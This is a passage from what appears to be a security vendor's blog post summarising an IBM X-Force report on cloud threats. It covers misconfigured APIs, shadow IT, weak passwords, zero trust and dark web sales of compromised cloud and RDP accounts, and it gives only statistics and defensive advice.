The Perfect Pivot — As enterprises struggle to monitor and detect threats across their cloud environments today, threat actors have been pivoting from on-premise into cloud environments, making this one of the most frequently observed infection vectors targeting cloud environments — accounting for 23% of incidents IBM responded to in 2020.
API Exposure — Another top infection vector we identified was improperly configured assets. Two-thirds of studied incidents involved improperly configured APIs. APIs lacking authentication controls can allow anyone, including threat actors, access to potentially sensitive information. On the flip side, APIs that are granted access to too much data can also result in inadvertent disclosures.
Many businesses don’t have the same level of confidence and expertise when configuring security controls in cloud computing environments compared to on-premise, which leads to a fragmented and more complex security environment that is tough to manage. Organizations need to manage their distributed infrastructure as one single environment to eliminate complexity and achieve better network visibility from cloud to edge and back. By modernizing their mission critical workloads, not only will security teams achieve speedier data recovery, but they will also gain a vastly more holistic pool of insights around threats to their organization that can inform and accelerate their response.
Trust That Attackers Will Succeed & Hold the Line
Evidence is mounting every day that the perimeter has been obliterated, and the findings in the report just add to that corpus of data. That is why taking a zero trust approach is growing in popularity and urgency. It removes the element of surprise and allows security teams to prepare for compromise rather than scramble to respond. By applying this framework, organizations can better protect their hybrid cloud infrastructure, enabling them to control all access to their environments and to monitor cloud activity and proper configurations. This way organizations can go on offense with their defense, uncovering risky behaviors and enforcing privacy regulation controls and least privilege access. Here is some of the evidence derived from the report:
Powerless Policy — Our research suggests that two-thirds of studied breaches into cloud environments would have likely been prevented by more robust hardening of systems, such as properly implementing security policies and patching.
Lurking in the Shadows — “Shadow IT”, cloud instances or resources that have not gone through an organization’s official channels, indicates that many organizations aren’t meeting today’s baseline security standards. In fact, X-Force estimates the use of shadow IT contributed to over 50% of studied data exposures.
Password is “admin 1” — The report illustrates X-Force Red data accumulated over the last year, revealing that the vast majority of the team’s penetration tests into various cloud environments found issues with either passwords or policy adherence.
The recurring use of these attack vectors emphasizes that threat actors are repeatedly relying on human error for a way into the organization. It’s imperative that businesses and security teams operate with the assumption of compromise to hold the line.
Dark Web Flea Markets Selling Cloud Access
Cloud resources are providing an excess of corporate footholds to cyber actors, drawing attention to the tens of thousands of cloud accounts available for sale on illicit marketplaces at bargain prices. The report reveals that nearly 30,000 compromised cloud accounts are on display on the dark web, with sale offers ranging from a few dollars to over $15,000 (depending on geography, the amount of credit on the account and the level of account access) and enticing refund policies designed to sway buyers.
But that’s not the only cloud “tool” for sale on dark web markets: our analysis highlights that Remote Desktop Protocol (RDP) accounts for more than 70% of the cloud resources for sale — a remote access method that greatly exceeds any other vector being marketed. While illicit marketplaces are the optimal shopping grounds for threat actors in need of cloud hacks, what concerns us most is a persistent pattern in which weak security controls and protocols — preventable forms of vulnerability — are repeatedly exploited for illicit access.